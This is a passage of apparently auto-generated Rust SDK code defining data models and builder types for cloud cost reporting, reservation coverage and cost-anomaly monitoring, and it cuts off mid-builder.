    /// <p>The period that this coverage was used over.</p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
    /// <p>The groups of instances that the reservation covered.</p>
    pub groups: std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
    /// <p>The total reservation coverage, in hours.</p>
    pub total: std::option::Option<crate::model::Coverage>,
}
impl std::fmt::Debug for CoverageByTime {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CoverageByTime")
            .field("time_period", &self.time_period)
            .field("groups", &self.groups)
            .field("total", &self.total)
            .finish()
    }
}
/// See [`CoverageByTime`](crate::model::CoverageByTime)
pub mod coverage_by_time {
    /// A builder for [`CoverageByTime`](crate::model::CoverageByTime)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
        pub(crate) groups:
            std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
        pub(crate) total: std::option::Option<crate::model::Coverage>,
    }
    impl Builder {
        /// <p>The period that this coverage was used over.</p>
        pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
            self.time_period = Some(input);
            self
        }
        /// <p>The period that this coverage was used over.</p>
        pub fn set_time_period(
            mut self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            self.time_period = input;
            self
        }
        /// Appends an item to `groups`.
        ///
        /// <p>The groups of instances that the reservation covered.</p>
        pub fn groups(mut self, input: impl Into<crate::model::ReservationCoverageGroup>) -> Self {
            let mut v = self.groups.unwrap_or_default();
            v.push(input.into());
            self.groups = Some(v);
            self
        }
        /// <p>The groups of instances that the reservation covered.</p>
        pub fn set_groups(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
        ) -> Self {
            self.groups = input;
            self
        }
        /// <p>The total reservation coverage, in hours.</p>
        pub fn total(mut self, input: crate::model::Coverage) -> Self {
            self.total = Some(input);
            self
        }
        /// <p>The total reservation coverage, in hours.</p>
        pub fn set_total(mut self, input: std::option::Option<crate::model::Coverage>) -> Self {
            self.total = input;
            self
        }
        /// Consumes the builder and constructs a [`CoverageByTime`](crate::model::CoverageByTime)
        pub fn build(self) -> crate::model::CoverageByTime {
            crate::model::CoverageByTime {
                time_period: self.time_period,
                groups: self.groups,
                total: self.total,
            }
        }
    }
}
impl CoverageByTime {
    /// Creates a new builder-style object to manufacture [`CoverageByTime`](crate::model::CoverageByTime)
    pub fn builder() -> crate::model::coverage_by_time::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>A group of reservations that share a set of attributes.</p>
///
/// Construct values of this type with [`ReservationCoverageGroup::builder`](crate::model::ReservationCoverageGroup).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationCoverageGroup {
    /// <p>The attributes for this group of reservations.</p>
    pub attributes:
        std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
    /// <p>How much instance usage this group of reservations covered.</p>
    pub coverage: std::option::Option<crate::model::Coverage>,
}
impl std::fmt::Debug for ReservationCoverageGroup {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationCoverageGroup")
            .field("attributes", &self.attributes)
            .field("coverage", &self.coverage)
            .finish()
    }
}
/// See [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
pub mod reservation_coverage_group {
    /// A builder for [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) attributes: std::option::Option<
            std::collections::HashMap<std::string::String, std::string::String>,
        >,
        pub(crate) coverage: std::option::Option<crate::model::Coverage>,
    }
    impl Builder {
        /// Adds a key-value pair to `attributes`.
        ///
        /// <p>The attributes for this group of reservations.</p>
        pub fn attributes(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<std::string::String>,
        ) -> Self {
            let mut hash_map = self.attributes.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.attributes = Some(hash_map);
            self
        }
        /// <p>The attributes for this group of reservations.</p>
        pub fn set_attributes(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, std::string::String>,
            >,
        ) -> Self {
            self.attributes = input;
            self
        }
        /// <p>How much instance usage this group of reservations covered.</p>
        pub fn coverage(mut self, input: crate::model::Coverage) -> Self {
            self.coverage = Some(input);
            self
        }
        /// <p>How much instance usage this group of reservations covered.</p>
        pub fn set_coverage(mut self, input: std::option::Option<crate::model::Coverage>) -> Self {
            self.coverage = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
        pub fn build(self) -> crate::model::ReservationCoverageGroup {
            crate::model::ReservationCoverageGroup {
                attributes: self.attributes,
                coverage: self.coverage,
            }
        }
    }
}
impl ReservationCoverageGroup {
    /// Creates a new builder-style object to manufacture [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
    pub fn builder() -> crate::model::reservation_coverage_group::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>The metadata of a specific type that you can use to filter and group your results. You
/// can use <code>GetDimensionValues</code> to find specific values.</p>
///
/// Construct values of this type with [`DimensionValuesWithAttributes::builder`](crate::model::DimensionValuesWithAttributes).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DimensionValuesWithAttributes {
    /// <p>The value of a dimension with a specific attribute.</p>
    pub value: std::option::Option<std::string::String>,
    /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
    pub attributes:
        std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
}
impl std::fmt::Debug for DimensionValuesWithAttributes {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("DimensionValuesWithAttributes")
            .field("value", &self.value)
            .field("attributes", &self.attributes)
            .finish()
    }
}
/// See [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
pub mod dimension_values_with_attributes {
    /// A builder for [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) value: std::option::Option<std::string::String>,
        pub(crate) attributes: std::option::Option<
            std::collections::HashMap<std::string::String, std::string::String>,
        >,
    }
    impl Builder {
        /// <p>The value of a dimension with a specific attribute.</p>
        pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
            self.value = Some(input.into());
            self
        }
        /// <p>The value of a dimension with a specific attribute.</p>
        pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.value = input;
            self
        }
        /// Adds a key-value pair to `attributes`.
        ///
        /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
        pub fn attributes(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<std::string::String>,
        ) -> Self {
            let mut hash_map = self.attributes.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.attributes = Some(hash_map);
            self
        }
        /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
        pub fn set_attributes(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, std::string::String>,
            >,
        ) -> Self {
            self.attributes = input;
            self
        }
        /// Consumes the builder and constructs a [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
        pub fn build(self) -> crate::model::DimensionValuesWithAttributes {
            crate::model::DimensionValuesWithAttributes {
                value: self.value,
                attributes: self.attributes,
            }
        }
    }
}
impl DimensionValuesWithAttributes {
    /// Creates a new builder-style object to manufacture [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
    pub fn builder() -> crate::model::dimension_values_with_attributes::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum Context {
    /// Wire value `COST_AND_USAGE`.
    CostAndUsage,
    /// Wire value `RESERVATIONS`.
    Reservations,
    /// Wire value `SAVINGS_PLANS`.
    SavingsPlans,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for Context {
    /// Maps a raw service string to a variant; unrecognized values are
    /// preserved verbatim in `Unknown` rather than rejected.
    fn from(s: &str) -> Self {
        match s {
            "COST_AND_USAGE" => Self::CostAndUsage,
            "RESERVATIONS" => Self::Reservations,
            "SAVINGS_PLANS" => Self::SavingsPlans,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for Context {
    type Err = std::convert::Infallible;
    /// Parsing never fails: every string maps to some variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl Context {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::CostAndUsage => "COST_AND_USAGE",
            Self::Reservations => "RESERVATIONS",
            Self::SavingsPlans => "SAVINGS_PLANS",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// All variant strings known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["COST_AND_USAGE", "RESERVATIONS", "SAVINGS_PLANS"]
    }
}
impl AsRef<str> for Context {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The result that's associated with a time period.</p>
///
/// Construct values of this type with [`ResultByTime::builder`](crate::model::ResultByTime).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResultByTime {
    /// <p>The time period that the result covers.</p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
    /// <p>The total amount of cost or usage accrued during the time period.</p>
    pub total: std::option::Option<
        std::collections::HashMap<std::string::String, crate::model::MetricValue>,
    >,
    /// <p>The groups that this time period includes.</p>
    pub groups: std::option::Option<std::vec::Vec<crate::model::Group>>,
    /// <p>Determines whether the result is estimated.</p>
    pub estimated: bool,
}
impl std::fmt::Debug for ResultByTime {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ResultByTime")
            .field("time_period", &self.time_period)
            .field("total", &self.total)
            .field("groups", &self.groups)
            .field("estimated", &self.estimated)
            .finish()
    }
}
/// See [`ResultByTime`](crate::model::ResultByTime)
pub mod result_by_time {
    /// A builder for [`ResultByTime`](crate::model::ResultByTime)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
        pub(crate) total: std::option::Option<
            std::collections::HashMap<std::string::String, crate::model::MetricValue>,
        >,
        pub(crate) groups: std::option::Option<std::vec::Vec<crate::model::Group>>,
        pub(crate) estimated: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The time period that the result covers.</p>
        pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
            self.time_period = Some(input);
            self
        }
        /// <p>The time period that the result covers.</p>
        pub fn set_time_period(
            mut self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            self.time_period = input;
            self
        }
        /// Adds a key-value pair to `total`.
        ///
        /// <p>The total amount of cost or usage accrued during the time period.</p>
        pub fn total(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<crate::model::MetricValue>,
        ) -> Self {
            let mut hash_map = self.total.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.total = Some(hash_map);
            self
        }
        /// <p>The total amount of cost or usage accrued during the time period.</p>
        pub fn set_total(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, crate::model::MetricValue>,
            >,
        ) -> Self {
            self.total = input;
            self
        }
        /// Appends an item to `groups`.
        ///
        /// <p>The groups that this time period includes.</p>
        pub fn groups(mut self, input: impl Into<crate::model::Group>) -> Self {
            let mut v = self.groups.unwrap_or_default();
            v.push(input.into());
            self.groups = Some(v);
            self
        }
        /// <p>The groups that this time period includes.</p>
        pub fn set_groups(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::Group>>,
        ) -> Self {
            self.groups = input;
            self
        }
        /// <p>Determines whether the result is estimated.</p>
        pub fn estimated(mut self, input: bool) -> Self {
            self.estimated = Some(input);
            self
        }
        /// <p>Determines whether the result is estimated.</p>
        pub fn set_estimated(mut self, input: std::option::Option<bool>) -> Self {
            self.estimated = input;
            self
        }
        /// Consumes the builder and constructs a [`ResultByTime`](crate::model::ResultByTime)
        pub fn build(self) -> crate::model::ResultByTime {
            crate::model::ResultByTime {
                time_period: self.time_period,
                total: self.total,
                groups: self.groups,
                // `estimated` falls back to `false` when never set.
                estimated: self.estimated.unwrap_or_default(),
            }
        }
    }
}
impl ResultByTime {
    /// Creates a new builder-style object to manufacture [`ResultByTime`](crate::model::ResultByTime)
    pub fn builder() -> crate::model::result_by_time::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>One level of grouped data in the results.</p>
///
/// Construct values of this type with [`Group::builder`](crate::model::Group).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Group {
    /// <p>The keys that are included in this group.</p>
    pub keys: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>The metrics that are included in this group.</p>
    pub metrics: std::option::Option<
        std::collections::HashMap<std::string::String, crate::model::MetricValue>,
    >,
}
impl std::fmt::Debug for Group {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Group")
            .field("keys", &self.keys)
            .field("metrics", &self.metrics)
            .finish()
    }
}
/// See [`Group`](crate::model::Group)
pub mod group {
    /// A builder for [`Group`](crate::model::Group)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) keys: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) metrics: std::option::Option<
            std::collections::HashMap<std::string::String, crate::model::MetricValue>,
        >,
    }
    impl Builder {
        /// Appends an item to `keys`.
        ///
        /// <p>The keys that are included in this group.</p>
        pub fn keys(mut self, input: impl Into<std::string::String>) -> Self {
            let mut v = self.keys.unwrap_or_default();
            v.push(input.into());
            self.keys = Some(v);
            self
        }
        /// <p>The keys that are included in this group.</p>
        pub fn set_keys(
            mut self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            self.keys = input;
            self
        }
        /// Adds a key-value pair to `metrics`.
        ///
        /// <p>The metrics that are included in this group.</p>
        pub fn metrics(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<crate::model::MetricValue>,
        ) -> Self {
            let mut hash_map = self.metrics.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.metrics = Some(hash_map);
            self
        }
        /// <p>The metrics that are included in this group.</p>
        pub fn set_metrics(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, crate::model::MetricValue>,
            >,
        ) -> Self {
            self.metrics = input;
            self
        }
        /// Consumes the builder and constructs a [`Group`](crate::model::Group)
        pub fn build(self) -> crate::model::Group {
            crate::model::Group {
                keys: self.keys,
                metrics: self.metrics,
            }
        }
    }
}
impl Group {
    /// Creates a new builder-style object to manufacture [`Group`](crate::model::Group)
    pub fn builder() -> crate::model::group::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>The association between a monitor, threshold, and list of subscribers used to deliver
/// notifications about anomalies detected by a monitor that exceeds a threshold. The
/// content consists of the detailed metadata and the current status of the
/// <code>AnomalySubscription</code> object. </p>
///
/// Construct values of this type with [`AnomalySubscription::builder`](crate::model::AnomalySubscription).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalySubscription {
    /// <p>The <code>AnomalySubscription</code> Amazon Resource Name (ARN). </p>
    pub subscription_arn: std::option::Option<std::string::String>,
    /// <p>Your unique account identifier. </p>
    pub account_id: std::option::Option<std::string::String>,
    /// <p>A list of cost anomaly monitors. </p>
    pub monitor_arn_list: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>A list of subscribers to notify. </p>
    pub subscribers: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
    /// <p>The dollar value that triggers a notification if the threshold is exceeded. </p>
    pub threshold: std::option::Option<f64>,
    /// <p>The frequency that anomaly reports are sent over email. </p>
    pub frequency: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
    /// <p>The name for the subscription. </p>
    pub subscription_name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for AnomalySubscription {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("AnomalySubscription")
            .field("subscription_arn", &self.subscription_arn)
            .field("account_id", &self.account_id)
            .field("monitor_arn_list", &self.monitor_arn_list)
            .field("subscribers", &self.subscribers)
            .field("threshold", &self.threshold)
            .field("frequency", &self.frequency)
            .field("subscription_name", &self.subscription_name)
            .finish()
    }
}
/// See [`AnomalySubscription`](crate::model::AnomalySubscription)
pub mod anomaly_subscription {
    /// A builder for [`AnomalySubscription`](crate::model::AnomalySubscription)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) subscription_arn: std::option::Option<std::string::String>,
        pub(crate) account_id: std::option::Option<std::string::String>,
        pub(crate) monitor_arn_list: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) subscribers: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
        pub(crate) threshold: std::option::Option<f64>,
        pub(crate) frequency: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
        pub(crate) subscription_name: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The <code>AnomalySubscription</code> Amazon Resource Name (ARN). </p>
        pub fn subscription_arn(mut self, input: impl Into<std::string::String>) -> Self {
            self.subscription_arn = Some(input.into());
            self
        }
        /// <p>The <code>AnomalySubscription</code> Amazon Resource Name (ARN). </p>
        pub fn set_subscription_arn(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.subscription_arn = input;
            self
        }
        /// <p>Your unique account identifier. </p>
        pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.account_id = Some(input.into());
            self
        }
        /// <p>Your unique account identifier. </p>
        pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.account_id = input;
            self
        }
        /// Appends an item to `monitor_arn_list`.
        ///
        /// <p>A list of cost anomaly monitors. </p>
        pub fn monitor_arn_list(mut self, input: impl Into<std::string::String>) -> Self {
            let mut v = self.monitor_arn_list.unwrap_or_default();
            v.push(input.into());
            self.monitor_arn_list = Some(v);
            self
        }
        /// <p>A list of cost anomaly monitors. </p>
        pub fn set_monitor_arn_list(
            mut self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            self.monitor_arn_list = input;
            self
        }
        /// Appends an item to `subscribers`.
        ///
        /// <p>A list of subscribers to notify. </p>
        pub fn subscribers(mut self, input: impl Into<crate::model::Subscriber>) -> Self {
            let mut v = self.subscribers.unwrap_or_default();
            v.push(input.into());
            self.subscribers = Some(v);
            self
        }
        /// <p>A list of subscribers to notify. </p>
        pub fn set_subscribers(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
        ) -> Self {
            self.subscribers = input;
            self
        }
        /// <p>The dollar value that triggers a notification if the threshold is exceeded. </p>
        pub fn threshold(mut self, input: f64) -> Self {
            self.threshold = Some(input);
            self
        }
        /// <p>The dollar value that triggers a notification if the threshold is exceeded. </p>
        pub fn set_threshold(mut self, input: std::option::Option<f64>) -> Self {
            self.threshold = input;
            self
        }
        /// <p>The frequency that anomaly reports are sent over email. </p>
        pub fn frequency(mut self, input: crate::model::AnomalySubscriptionFrequency) -> Self {
            self.frequency = Some(input);
            self
        }
        /// <p>The frequency that anomaly reports are sent over email. </p>
        pub fn set_frequency(
            mut self,
            input: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
        ) -> Self {
            self.frequency = input;
            self
        }
        /// <p>The name for the subscription. </p>
        pub fn subscription_name(mut self, input: impl Into<std::string::String>) -> Self {
            self.subscription_name = Some(input.into());
            self
        }
        /// <p>The name for the subscription. </p>
        pub fn set_subscription_name(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.subscription_name = input;
            self
        }
        /// Consumes the builder and constructs a [`AnomalySubscription`](crate::model::AnomalySubscription)
        pub fn build(self) -> crate::model::AnomalySubscription {
            crate::model::AnomalySubscription {
                subscription_arn: self.subscription_arn,
                account_id: self.account_id,
                monitor_arn_list: self.monitor_arn_list,
                subscribers: self.subscribers,
                threshold: self.threshold,
                frequency: self.frequency,
                subscription_name: self.subscription_name,
            }
        }
    }
}
impl AnomalySubscription {
    /// Creates a new builder-style object to manufacture [`AnomalySubscription`](crate::model::AnomalySubscription)
    pub fn builder() -> crate::model::anomaly_subscription::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>This object continuously inspects your account's cost data for anomalies. It's based
/// on <code>MonitorType</code> and <code>MonitorSpecification</code>. The content consists
/// of detailed metadata and the current status of the monitor object. </p>
///
/// Construct values of this type with the builder in [`crate::model::anomaly_monitor`].
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyMonitor {
    /// <p>The Amazon Resource Name (ARN) value. </p>
    pub monitor_arn: std::option::Option<std::string::String>,
    /// <p>The name of the monitor. </p>
    pub monitor_name: std::option::Option<std::string::String>,
    /// <p>The date when the monitor was created. </p>
    pub creation_date: std::option::Option<std::string::String>,
    /// <p>The date when the monitor was last updated. </p>
    pub last_updated_date: std::option::Option<std::string::String>,
    /// <p>The date when the monitor last evaluated for anomalies. </p>
    pub last_evaluated_date: std::option::Option<std::string::String>,
    /// <p>The possible type values. </p>
    pub monitor_type: std::option::Option<crate::model::MonitorType>,
    /// <p>The dimensions to evaluate. </p>
    pub monitor_dimension: std::option::Option<crate::model::MonitorDimension>,
    /// <p>Use <code>Expression</code> to filter by cost or by usage. There are two patterns: </p>
    /// <ul>
    /// <li>
    /// <p>Simple dimension values - You can set the dimension name and values for the
    /// filters that you plan to use. For example, you can filter for
    /// <code>REGION==us-east-1 OR REGION==us-west-1</code>. For
    /// <code>GetRightsizingRecommendation</code>, the Region is a full name (for
    /// example, <code>REGION==US East (N. Virginia)</code>. The <code>Expression</code>
    /// example is as follows:</p>
    /// <p>
    /// <code>{ "Dimensions": { "Key": "REGION", "Values": [ "us-east-1", “us-west-1” ]
    /// } }</code>
    /// </p>
    /// <p>The list of dimension values are OR'd together to retrieve cost or usage data.
    /// You can create <code>Expression</code> and <code>DimensionValues</code> objects
    /// using either <code>with*</code> methods or <code>set*</code> methods in multiple
    /// lines. </p>
    /// </li>
    /// <li>
    /// <p>Compound dimension values with logical operations - You can use multiple
    /// <code>Expression</code> types and the logical operators
    /// <code>AND/OR/NOT</code> to create a list of one or more
    /// <code>Expression</code> objects. By doing this, you can filter on more
    /// advanced options. For example, you can filter on <code>((REGION == us-east-1 OR
    /// REGION == us-west-1) OR (TAG.Type == Type1)) AND (USAGE_TYPE !=
    /// DataTransfer)</code>. The <code>Expression</code> for that is as
    /// follows:</p>
    /// <p>
    /// <code>{ "And": [ {"Or": [ {"Dimensions": { "Key": "REGION", "Values": [
    /// "us-east-1", "us-west-1" ] }}, {"Tags": { "Key": "TagName", "Values":
    /// ["Value1"] } } ]}, {"Not": {"Dimensions": { "Key": "USAGE_TYPE", "Values":
    /// ["DataTransfer"] }}} ] } </code>
    /// </p>
    /// <note>
    /// <p>Because each <code>Expression</code> can have only one operator, the
    /// service returns an error if more than one is specified. The following
    /// example shows an <code>Expression</code> object that creates an
    /// error.</p>
    /// </note>
    /// <p>
    /// <code> { "And": [ ... ], "DimensionValues": { "Dimension": "USAGE_TYPE",
    /// "Values": [ "DataTransfer" ] } } </code>
    /// </p>
    /// </li>
    /// </ul>
    /// <note>
    /// <p>For the <code>GetRightsizingRecommendation</code> action, a combination of OR and
    /// NOT isn't supported. OR isn't supported between different dimensions, or dimensions
    /// and tags. NOT operators aren't supported. Dimensions are also limited to
    /// <code>LINKED_ACCOUNT</code>, <code>REGION</code>, or
    /// <code>RIGHTSIZING_TYPE</code>.</p>
    /// <p>For the <code>GetReservationPurchaseRecommendation</code> action, only NOT is
    /// supported. AND and OR aren't supported. Dimensions are limited to
    /// <code>LINKED_ACCOUNT</code>.</p>
    /// </note>
    pub monitor_specification: std::option::Option<crate::model::Expression>,
    /// <p>The value for evaluated dimensions. </p>
    pub dimensional_value_count: i32,
}
impl std::fmt::Debug for AnomalyMonitor {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("AnomalyMonitor")
            .field("monitor_arn", &self.monitor_arn)
            .field("monitor_name", &self.monitor_name)
            .field("creation_date", &self.creation_date)
            .field("last_updated_date", &self.last_updated_date)
            .field("last_evaluated_date", &self.last_evaluated_date)
            .field("monitor_type", &self.monitor_type)
            .field("monitor_dimension", &self.monitor_dimension)
            .field("monitor_specification", &self.monitor_specification)
            .field("dimensional_value_count", &self.dimensional_value_count)
            .finish()
    }
}
/// See [`AnomalyMonitor`](crate::model::AnomalyMonitor)
pub mod anomaly_monitor {
    /// A builder for [`AnomalyMonitor`](crate::model::AnomalyMonitor)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) monitor_arn: std::option::Option<std::string::String>,
        pub(crate) monitor_name: std::option::Option<std::string::String>,
        pub(crate) creation_date: std::option::Option<std::string::String>,
        pub(crate) last_updated_date: std::option::Option<std::string::String>,
        pub(crate) last_evaluated_date: std::option::Option<std::string::String>,
        pub(crate) monitor_type: std::option::Option<crate::model::MonitorType>,
        pub(crate) monitor_dimension: std::option::Option<crate::model::MonitorDimension>,
        pub(crate) monitor_specification: std::option::Option<crate::model::Expression>,
        pub(crate) dimensional_value_count: std::option::Option<i32>,
    }
    impl Builder {
        /// Sets the Amazon Resource Name (ARN) value.
        pub fn monitor_arn(self, input: impl Into<std::string::String>) -> Self {
            self.set_monitor_arn(Some(input.into()))
        }
        /// Sets or clears the Amazon Resource Name (ARN) value.
        pub fn set_monitor_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.monitor_arn = input;
            self
        }
        /// Sets the name of the monitor.
        pub fn monitor_name(self, input: impl Into<std::string::String>) -> Self {
            self.set_monitor_name(Some(input.into()))
        }
        /// Sets or clears the name of the monitor.
        pub fn set_monitor_name(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.monitor_name = input;
            self
        }
        /// Sets the date when the monitor was created.
        pub fn creation_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_creation_date(Some(input.into()))
        }
        /// Sets or clears the date when the monitor was created.
        pub fn set_creation_date(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.creation_date = input;
            self
        }
        /// Sets the date when the monitor was last updated.
        pub fn last_updated_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_last_updated_date(Some(input.into()))
        }
        /// Sets or clears the date when the monitor was last updated.
        pub fn set_last_updated_date(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.last_updated_date = input;
            self
        }
        /// Sets the date when the monitor last evaluated for anomalies.
        pub fn last_evaluated_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_last_evaluated_date(Some(input.into()))
        }
        /// Sets or clears the date when the monitor last evaluated for anomalies.
        pub fn set_last_evaluated_date(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.last_evaluated_date = input;
            self
        }
        /// Sets the monitor type.
        pub fn monitor_type(self, input: crate::model::MonitorType) -> Self {
            self.set_monitor_type(Some(input))
        }
        /// Sets or clears the monitor type.
        pub fn set_monitor_type(
            mut self,
            input: std::option::Option<crate::model::MonitorType>,
        ) -> Self {
            self.monitor_type = input;
            self
        }
        /// Sets the dimensions to evaluate.
        pub fn monitor_dimension(self, input: crate::model::MonitorDimension) -> Self {
            self.set_monitor_dimension(Some(input))
        }
        /// Sets or clears the dimensions to evaluate.
        pub fn set_monitor_dimension(
            mut self,
            input: std::option::Option<crate::model::MonitorDimension>,
        ) -> Self {
            self.monitor_dimension = input;
            self
        }
        /// Sets the [`Expression`](crate::model::Expression) used to filter by cost or
        /// usage. Either a simple dimension-value filter or a compound expression
        /// combining sub-expressions with `And`/`Or`/`Not`; each `Expression` may use
        /// only one operator. See the `Expression` type docs for the supported
        /// patterns and per-action restrictions.
        pub fn monitor_specification(self, input: crate::model::Expression) -> Self {
            self.set_monitor_specification(Some(input))
        }
        /// Sets or clears the `Expression` used to filter by cost or usage.
        pub fn set_monitor_specification(
            mut self,
            input: std::option::Option<crate::model::Expression>,
        ) -> Self {
            self.monitor_specification = input;
            self
        }
        /// Sets the value for evaluated dimensions.
        pub fn dimensional_value_count(self, input: i32) -> Self {
            self.set_dimensional_value_count(Some(input))
        }
        /// Sets or clears the value for evaluated dimensions.
